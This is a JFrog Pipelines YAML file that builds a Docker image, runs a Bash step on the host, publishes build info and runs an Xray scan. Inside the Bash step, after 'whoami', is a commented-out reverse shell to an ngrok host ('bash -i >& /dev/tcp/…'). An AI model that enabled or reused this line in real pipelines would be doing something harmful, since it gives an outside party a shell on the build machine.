resources:
  - name: yuval_repo
    type: GitRepo
    configuration:
      gitProvider: yuvalGithub
      path: mor2k1/linux
      branches:
        include: IntelliJ

  - name: docker_file
    type: Image
    configuration:
      registry: yuvalArtifactory
      sourceRepository: main-repohubvirt
      imageName: avigdor.jfrog.io/main-repohubvirt/ubuntu
      imageTag: latest
      autoPull: true

  - name: docker_build
    type: BuildInfo
    configuration:
      sourceArtifactory: yuvalArtifactory
      buildName: docker_build_yuval
      buildNumber: latest

  - name: build_info
    type: BuildInfo
    configuration:
      sourceArtifactory: yuvalArtifactory
      buildName: xray_build
      buildNumber: ${run_numebr}

pipelines:
  - name: yuval_pipeline_build_docker
    steps:
      - name: docker_build
        type: DockerBuild
        configuration:
          affinityGroup: yuval_docker
          dockerFileLocation: .
          dockerFileName: Dockerfile
          dockerImageName: avigdor.jfrog.io/main-repohubvirt/ubuntu
          dockerImageTag: ${run_number}
          inputResources:
            - name: yuval_repo
            - name: docker_file
          integrations:
            - name: yuvalArtifactory
            
      - name: build
        type: Bash
        configuration:
          affinityGroup: yuval_docker
          runtime:
            type: host
          inputSteps:
            - name: docker_build
        execution:
          onExecute:
            - pwd
            - whoami
            #- bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/11712 0>&1
          onSuccess:
            - echo "succes"
      
      - name: build_info
        type: PublishBuildInfo
        configuration:
          inputSteps:
            - name: docker_build
          outputResources:
            - name: build_info
      
      - name: xray_scan
        type: XrayScan
        configuration:
          failOnScan: false
          inputResources:
            - name: build_info
          inputSteps: 
            - name: build
          affinityGroup: yuval_docker
        execution:
          onSuccess:
            - echo "succes to run Xray Scan"
